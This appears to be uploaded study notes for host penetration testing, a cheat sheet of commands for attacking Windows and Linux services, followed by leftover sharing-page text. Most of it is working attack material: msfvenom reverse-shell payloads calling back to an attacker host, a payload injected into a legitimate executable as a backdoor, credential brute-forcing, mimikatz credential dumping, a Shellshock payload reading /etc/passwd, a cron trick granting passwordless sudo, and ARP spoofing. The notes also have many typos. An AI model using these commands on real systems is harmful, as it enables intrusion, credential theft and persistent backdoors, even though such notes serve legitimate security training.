Host Pentes

Frequently Exploited Windows SErvices
Micrososft IIS
WebDav
SMb/CIFS
RDP
WinRm
Microsoft IIS and WebDav exploiting techniques
Tools: davtest,cadaver
nmap -sV -p 80 --script=http-enum $IP (enumareting webdav)
hydra -L userlists -P passlists $IP http-get /webdav/ (brute force for webdav
credentials)
davtest -auth bob:password_12121 -url http://$IP/webdav/ (for connecting)
cadaver http://$IP/webdav (connecting to webdav)
Exploiting with metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHSOT=$Local_IP LPORT=4444 -f asp >
payload.asp (creating reverse payload with msfvenom)
using cadaver upload this file to webdav
msfconsole > use/multi/handler > set payload windows/meterpreter/reverse_tcp > set
LHOST > set LPORT > run
Microsoft SMB exploiting techniques
User Authenticaion
Share Authentication
tools: PsExec alternative of telnet,metasploit
psexec.py username@ip cmd.exe
nmap -sV -p 445 --script=smb-vuln-ms17-010 $IP (eternal blue vulnerability check)
RDP exploiting techniques
Tools: metasploit framewrok,hydra
auxiliary/scanner/rdp/rdp_scanner
xfreerdp /u:username /p:password /v:$IP:Port
BlueKeep vulnerability
WinRM exploiting techniques

Tools:crackmapexec,evli-winrm (getting shell from enviroment),metasploit
crackmapexec winrm $IP -u username -p wordlists for passwords (cracking winrm
credentials)
crackmapexec winrm $IP -u username -p password -x command (execute command on
target system)
evil-winrm.rb -u username -p password -i$IP (access target system)
Windows privilige escalation techniques

Kernel exploits
tools:windows exploits suggesters,sec wiki,metasploit
getuid,getprivs,getsystems
use post/multi/recon/local_exploit
set session num
run
UAC(user account control) exploit
Tools:UACME
pgrep explorer
migrate $ID
net localgroup administrator
msfvenom -p windows/meterpreter/reverse_tcp lhost=$IP lport=$POrt -f exe >
backdor.exe
Access token impersonation
Impersonate-level token
Delegate-level token
SeAssignPrimaryToken
SeCreateToken
SeImpresonatePrivlige
Tools:incognito meterpreter
load incognito
list_tokens -u
impersonate_token "USERNAME"
Windows credentials dumping techniques

Unattended windows setup utility paths: C:\Windows\Panther\Unattend.xml,C:\Windows\
Panther\Autonattend.xml
certutil -urlcache -f $URL $FILE (downloading file with cmd)
search -f Unattend.xml (searching in meterpereter)
Dumping credentials with mimikatz
load kiwi
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
privilige::debug
lsadump::sam
lsadump::secret
sekurlsa::logonpasswords
Pass-The-Hash Attacks
kiwi and hashdump
search smb psexec
Exploiting Linux Services
Frequently exploited linux service:Apache Web Server,ssh,ftp,samba
Exploiting Apache Server(shell sock vulnerbalitiy)

nmap -sV $IP --script=http-shellshock --script-args
"http-shellshock.uri=/gettime.cgi"
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Exploiting Linux Samba sevcie
Tools:enum4linux,smbclient,hydra,smbmap
smbmap -H $IP -u username -p password
smbclient -L $IP -U username
enum4linux -a $IP
Linux Privilige escalation
Escalation with cron jobs

cd /
grep -rnw /usr -e "/home/student/message"
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> etc/sudoers' >cronjobs
Network based attacks
Types: ARP,DHCP,SMB,FTP,TELNET,SSH
nmap $IP/subnet -sn
Tshark
thsark -r $File -z io,phs -q (protocol hireacy)
tshark -r $File -Y 'http' (filtering http traffic)
thasrk -r $File -Y 'ip.src==$ip && ip.dst==$ip' (filtering based on ip)
tshark -r $File -Y 'http.request.method==GET' (filtering for get request)

tshark -r $File -Y 'http.request.method==GET' -Tfields -e frame.time -e ip.src -e
http.request.full_uri (add fields)
tshark -r $File -Y 'http contains password' (finding password header in request)
http.host, http_cookie ip contains amazon.in http.user_agent
ARP Spoofing
echo 1> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
Wifi `traffic analysis
Importing nmap results to metasploit

Using -oX flag give output of nmap scan as xml file.
db_import $filename
hosts
services
Metasploit Auxiliry Modules
run autoroute -s $IP
udp_sweep
search type:auxliriry name:ftp
http_version,http_header,robots_txt,dir_scanner,file_dir,http_login,apache_userdir_
enum
mysql_enum,mysql_version,mysql_sql
ssh_enumusers
db_autopwn,analyze,vulns
load wmap,wmap_sites -a $IP
Generating payload with mfvenom
msfvenom -a x64 windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f exe >
payload64.exe
msfvenom -a x86 windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f exe >
payload86.exe
msfvenom linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f elf > payload64
Encoding payloads
mfsvenom -p windows/meterpreter/reverse_tcp LHOST=$Ip LPORT=$Port -e
x86/shikata_ga_nai -f exe> encodex86.exe
-i 10 (10 iteration encoding)
Injecting payload to portable executables
mfsvenom -p windows/meterpreter/reverse_tcp LHOST=$Ip LPORT=$Port -e
x86/shikata_ga_nai -i 10 -f exe -k -x $PathofPE> encodex86.exe
-k(keep originial functionality of PE)
Automate metasploit with resource script
wim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $IP
set LPORT $PORT
run
(Save)
mfsconsole -r handler.rc
vim portscan.rc
use auxiliary/scanner/portscan/tcp
set RHOSTS $IP
run
(Save)
mfsconsole -r portscan.rc
resource $pathofscript

Host Pentes

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Host Pentes

Uploaded by

Copyright:

Available Formats

Frequently Exploited Windows SErvices

Microsoft IIS and WebDav exploiting techniques

Exploiting with metasploit:

WinRM exploiting techniques

Windows privilige escalation techniques

Windows credentials dumping techniques

Exploiting Apache Server(shell sock vulnerbalitiy)

Escalation with cron jobs

tshark -r $File -Y 'http.request.method==GET' (filtering for get request)

Importing nmap results to metasploit

You might also like